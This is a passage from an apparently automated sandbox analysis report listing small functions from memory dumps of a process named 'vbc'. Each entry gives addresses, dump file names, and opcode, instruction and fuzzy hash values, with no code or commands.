                                                                                                    • Instruction ID: 9e383c37845dd122193d2cf5b53082c50f2410fc2da4274ec1252f618592b546
                                                                                                    • Opcode Fuzzy Hash: 6a93cac6a4c91645a0bbe877baada9eec3525a164dfceb6dd37ff5e427f75033
                                                                                                    • Instruction Fuzzy Hash: 1AD0C97190510CAF8B00DFE88D0199FBBF9EB05204B1182A69908D7211FA315F10AB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00260980 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8b6bdf66e592863374e596baa38ed7574d6de25ad7b7b5173719e351f70583d8
                                                                                                    • Instruction ID: f6fd1b43b31cf24e83c3acf96d87bf979fdf92810a7a9d9bcf586cfc532f223b
                                                                                                    • Opcode Fuzzy Hash: 8b6bdf66e592863374e596baa38ed7574d6de25ad7b7b5173719e351f70583d8
                                                                                                    • Instruction Fuzzy Hash: 58D0C9B590510CEF8B00DFE5DE048AEBBF9EF05214B5041A69A09D3211EA365F109B93
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00261E68 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: db42b60ad405680cb101ab0598dfbf97500f1dd6f45d1f068495c0a0ee7b4496
                                                                                                    • Instruction ID: 33f060ac04d6eb732f6c076f020932979b14b01597bd4a4884f7bc13df129248
                                                                                                    • Opcode Fuzzy Hash: db42b60ad405680cb101ab0598dfbf97500f1dd6f45d1f068495c0a0ee7b4496
                                                                                                    • Instruction Fuzzy Hash: 6AD0C97191510CAF8B00DFE4CD41A9FB7FDEB05204B1141A69A09D7211EA315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484E880 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bdf44fa73bb6631cec7fdd1fd53b712de7d3e5538a1578b74a8d36a7054960a9
                                                                                                    • Instruction ID: 17fba3316c9f024016a6808c448877db20958ef727a0bbecf26d546981904107
                                                                                                    • Opcode Fuzzy Hash: bdf44fa73bb6631cec7fdd1fd53b712de7d3e5538a1578b74a8d36a7054960a9
                                                                                                    • Instruction Fuzzy Hash: 7BD0C97591510CAF8B04DFE88D0199EB7F9EB05304B2181F69908D7211EA325F546B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484C4A0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 047567bfcc1f46649c8a33426db1c87ced0b25bf9f742fd35ad69618740d7ea1
                                                                                                    • Instruction ID: 59df6cc4cc0cb7133653c0d0d41254c34a7153793c51b8a289cee08c8590e662
                                                                                                    • Opcode Fuzzy Hash: 047567bfcc1f46649c8a33426db1c87ced0b25bf9f742fd35ad69618740d7ea1
                                                                                                    • Instruction Fuzzy Hash: 4DD0C971D0510CAF8B00DFF48D0199EB7F9EB45244B1181A69908D7211EE715F106BD2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484F430 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24e750aa5e3ab8f992428dc08983883d32e15ce8f3764d2339b0d2fa41bf79e1
                                                                                                    • Instruction ID: d74a84e676b0607ee76bd599baf0b6231dfe3ed7df578d2e6abc8bc5cb368c81
                                                                                                    • Opcode Fuzzy Hash: 24e750aa5e3ab8f992428dc08983883d32e15ce8f3764d2339b0d2fa41bf79e1
                                                                                                    • Instruction Fuzzy Hash: 30D0C97190510CAF8B00DFE8CD0199EBBF9EB45204B2181A69908D7211EA315F206B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484C568 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a11dc85ef7c6fbc51b15ed2e78ec009a8ebc0f5bc66fb046ad05b22747c94146
                                                                                                    • Instruction ID: 5aff1b677e3570917e51b56238f2daf385d92ad00f2270472474b3aab3fc02f6
                                                                                                    • Opcode Fuzzy Hash: a11dc85ef7c6fbc51b15ed2e78ec009a8ebc0f5bc66fb046ad05b22747c94146
                                                                                                    • Instruction Fuzzy Hash: 7BD0C971D0510CAF8B00DFE89D0199EB7F9EB45204B1181E79909D7211EA315F10ABE2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484DEE0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 66563aaf2de0f9db2fe41a3ced1c534bb4519db78b859530713d99e9760e0161
                                                                                                    • Instruction ID: db586999e3a75ef1c6f3c3003b5e50fc208b66cc7cf9c1aafb592fe6feb11ff3
                                                                                                    • Opcode Fuzzy Hash: 66563aaf2de0f9db2fe41a3ced1c534bb4519db78b859530713d99e9760e0161
                                                                                                    • Instruction Fuzzy Hash: 9DD0C97190510CAF8B00DFE48D0199EB7F9EB05204B1181A69909D7211EA315F20ABA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484CA10 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf6c4279290830342c020183b179f245e8211cc2d2aeb0a920fcb5a867ffde19
                                                                                                    • Instruction ID: 7759b9c635a9829adb8f5a39672aa7da93e7a2d7610333ee8bbb7a1baa7dad92
                                                                                                    • Opcode Fuzzy Hash: bf6c4279290830342c020183b179f245e8211cc2d2aeb0a920fcb5a867ffde19
                                                                                                    • Instruction Fuzzy Hash: 73D0C97190510CAF8B00DFE88D0299EB7F9EB05204B1181A69908D7211EE315F106BD2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484D760 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 180e62919535a1eb2cc1d24f6b646133baf0f7e5574140b7508657c9f204a375
                                                                                                    • Instruction ID: e53d247de52677dd305191955f39958fb7636b275527b7b9f4683834deea93c7
                                                                                                    • Opcode Fuzzy Hash: 180e62919535a1eb2cc1d24f6b646133baf0f7e5574140b7508657c9f204a375
                                                                                                    • Instruction Fuzzy Hash: DAD0C975A0510CAF8B00DFE98D0199EB7FEEB45204B1181B69908D7211EA315F506BD2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484FB78 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 874e32e9c705cca45babdf9963e588d36b4ed91db025d181c1527f5f4e45545c
                                                                                                    • Instruction ID: 5323bbd03c417fea4fd6588a3c815696e895c2d1ea3ebe5947db31b92ef2af34
                                                                                                    • Opcode Fuzzy Hash: 874e32e9c705cca45babdf9963e588d36b4ed91db025d181c1527f5f4e45545c
                                                                                                    • Instruction Fuzzy Hash: E0D0C97190510CAF8B01EFE98D0199EB7F9EB45205B1181E6A908D7211EA315F146B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F3148 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2db67f60261193470b60cae0096318910f0d2fe2b476f288f0f0f08ef9d5b627
                                                                                                    • Instruction ID: 4b59b7f0572c3babfc539e309aa2e8964f358d22a5479609aeb3476dbc74ac30
                                                                                                    • Opcode Fuzzy Hash: 2db67f60261193470b60cae0096318910f0d2fe2b476f288f0f0f08ef9d5b627
                                                                                                    • Instruction Fuzzy Hash: 3DD0C9322182119B8708CF48E850C6AB7E6EBCC310B18885EB45583350CB62DC16CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FFA4F Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e208d4848148ca000dbf3715019a7af01a313cce16f4d6bf218ff5a5af2a025f
                                                                                                    • Instruction ID: c7a32e6c5a5b36671764600eae8601fa9b7ffc0ddd70a78b383ae42186ead544
                                                                                                    • Opcode Fuzzy Hash: e208d4848148ca000dbf3715019a7af01a313cce16f4d6bf218ff5a5af2a025f
                                                                                                    • Instruction Fuzzy Hash: DFD06739A010099BCB04DB84E5409EDF771EB84325F20805BD91567250C7329A16DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F3248 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2db67f60261193470b60cae0096318910f0d2fe2b476f288f0f0f08ef9d5b627
                                                                                                    • Instruction ID: 4b59b7f0572c3babfc539e309aa2e8964f358d22a5479609aeb3476dbc74ac30
                                                                                                    • Opcode Fuzzy Hash: 2db67f60261193470b60cae0096318910f0d2fe2b476f288f0f0f08ef9d5b627
                                                                                                    • Instruction Fuzzy Hash: 3DD0C9322182119B8708CF48E850C6AB7E6EBCC310B18885EB45583350CB62DC16CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FCB92 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 70e281b67f0403d884567b31d43f865db377eaffb318ba32b101905a68e78f0b
                                                                                                    • Instruction ID: 9595aa8ee06fa007f144779137ed47027ba7c905081d6f25efb3828a118416f6
                                                                                                    • Opcode Fuzzy Hash: 70e281b67f0403d884567b31d43f865db377eaffb318ba32b101905a68e78f0b
                                                                                                    • Instruction Fuzzy Hash: E2D0926420E2C05FC306C7248890956BFB6AF96214718C1DE9488CB2A3CB2AD80BCB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FDFC1 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d7f9a5ff8a42f4ee986165a9e112c6782a30aa99a231e9d0253c53fee8aeee66
                                                                                                    • Instruction ID: 6e4acef357fb79fda1dba13e70cc1852ad815680cf9710bceef399c1dfb44cda
                                                                                                    • Opcode Fuzzy Hash: d7f9a5ff8a42f4ee986165a9e112c6782a30aa99a231e9d0253c53fee8aeee66
                                                                                                    • Instruction Fuzzy Hash: 19D0926271E3C05FC346C6309862485BF709AA310575A88DFD8848B197E625D90BC766
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FFFE1 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8cc25d4a89400ccae5c63cc8c1c2513d2629935613608ccecad94afb4f83e08d
                                                                                                    • Instruction ID: e53b878d8454c78c1ea54acbc6342c907c3b710eda0ba4964aba8ea6fc790b47
                                                                                                    • Opcode Fuzzy Hash: 8cc25d4a89400ccae5c63cc8c1c2513d2629935613608ccecad94afb4f83e08d
                                                                                                    • Instruction Fuzzy Hash: 9CC0128010E2C12FC71787204C7A882AF29AE5326030A01CBA0988B0E3C609491AC3B2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484D0B0 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 608ec637770917574aadd8404a49cbf5b58111fb236ef35dcf221e49180a6afc
                                                                                                    • Instruction ID: c54bed2fcf356a3979ed0c810be7c46ea1acd690f016c88f04df951dd5ed2184
                                                                                                    • Opcode Fuzzy Hash: 608ec637770917574aadd8404a49cbf5b58111fb236ef35dcf221e49180a6afc
                                                                                                    • Instruction Fuzzy Hash: 57C0128120E6C98FC38383618CA08E07F20AC6304030A02CBC494CB1E3C6016B2ED35A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484E100 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c527266d84d5b6e3bd6fd959cc4b5181bf16b17f586cec056970f99f785609f8
                                                                                                    • Instruction ID: 7705d30d26132316cb85fa76666f4796e7d337b3b9ea0b897b89b91773be32a7
                                                                                                    • Opcode Fuzzy Hash: c527266d84d5b6e3bd6fd959cc4b5181bf16b17f586cec056970f99f785609f8
                                                                                                    • Instruction Fuzzy Hash: 47D0128011EBC91FD30357204D644E07F60FD5305034903C7C894CA0A7CF09272EE396
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F7930 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ad784f3dc8a30530f9c61991ab1bae5f602edbf5cf5c5dc4ffe274df49dc315d
                                                                                                    • Instruction ID: 3733535d86d137b7bccdb223feeb6b03bff4e9162f64b433ab4593f023d479c3
                                                                                                    • Opcode Fuzzy Hash: ad784f3dc8a30530f9c61991ab1bae5f602edbf5cf5c5dc4ffe274df49dc315d
                                                                                                    • Instruction Fuzzy Hash: 84C002D2E0E2C09FC35347614C684506F616D63100B2F80DBD0958B0A3DA095E17D752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F19D8 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                    • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                    • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                    • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F4340 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1a551cf2e106f368b32cb272d9cc54b9631e649863b6c94f64d148cbdcbb9a03
                                                                                                    • Instruction ID: c9bd431ffd4e76f61b0f03644611902be9106437fb42bd2bb3adc2a7257d1a92
                                                                                                    • Opcode Fuzzy Hash: 1a551cf2e106f368b32cb272d9cc54b9631e649863b6c94f64d148cbdcbb9a03
                                                                                                    • Instruction Fuzzy Hash: 68D022302091401BC342C660C884E72FFB2DFC6310F24C0ADA84887362EB32A937C700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FABA8 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                                                                    • Instruction ID: bcf9ef9c82f7d3924de405cb1b01dc34d2668a849c410a3a4cb9bba8efa29a2e
                                                                                                    • Opcode Fuzzy Hash: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                                                                    • Instruction Fuzzy Hash: 91C012712082605F8244DA48C850C67F7E9AFCD110718C84FB494C3341CA61DC07C7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FAFD8 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e195171dea86df2e454e4487a7eff9ef4368223538656dacfdb26135256c96b
                                                                                                    • Instruction ID: 639ee5098061c1fbb09fdf8d6433489de56282da6a193ebcd2b8d5ba6915f70f
                                                                                                    • Opcode Fuzzy Hash: 6e195171dea86df2e454e4487a7eff9ef4368223538656dacfdb26135256c96b
                                                                                                    • Instruction Fuzzy Hash: B8D09274200601ABC304CA08C886A1ABBA6AF84304F10C01DB85CCB291DB72D9229A45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522850 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                                                                    • Instruction ID: bcf9ef9c82f7d3924de405cb1b01dc34d2668a849c410a3a4cb9bba8efa29a2e
                                                                                                    • Opcode Fuzzy Hash: d8f08d21f774e0548807ce75b8506ffde3543316bcdcbdd5788bc2b68125c542
                                                                                                    • Instruction Fuzzy Hash: 91C012712082605F8244DA48C850C67F7E9AFCD110718C84FB494C3341CA61DC07C7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265069 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8c3d1911cc070787dd31d03169aeb4899a245fda8f36330ae9957eef6f57f24d
                                                                                                    • Instruction ID: 84ef037640584302dd84cf2dc2f4e6b549ae5ba84df2ccf7dc20507b4cc74db0
                                                                                                    • Opcode Fuzzy Hash: 8c3d1911cc070787dd31d03169aeb4899a245fda8f36330ae9957eef6f57f24d
                                                                                                    • Instruction Fuzzy Hash: CAD0127861D2804FD381CB3488B27D47F70AB52187F58C499D4949720BD9318C17D714
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484D050 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                    • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                                                    • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                                                    • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484E851 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7f0e2695283bb6d7c3166054b5650c15529af1692d7752fc5ac3daf208f41929
                                                                                                    • Instruction ID: d63712bd97d6b8df2060cfc18bed740e8cd144385a8fdebcb04622a9a7f717a4
                                                                                                    • Opcode Fuzzy Hash: 7f0e2695283bb6d7c3166054b5650c15529af1692d7752fc5ac3daf208f41929
                                                                                                    • Instruction Fuzzy Hash: 6FC0128000EAC82FC30386244C688A0BF30ACA301130983CF9494C60A3C6056B2ED366
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484E7B1 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
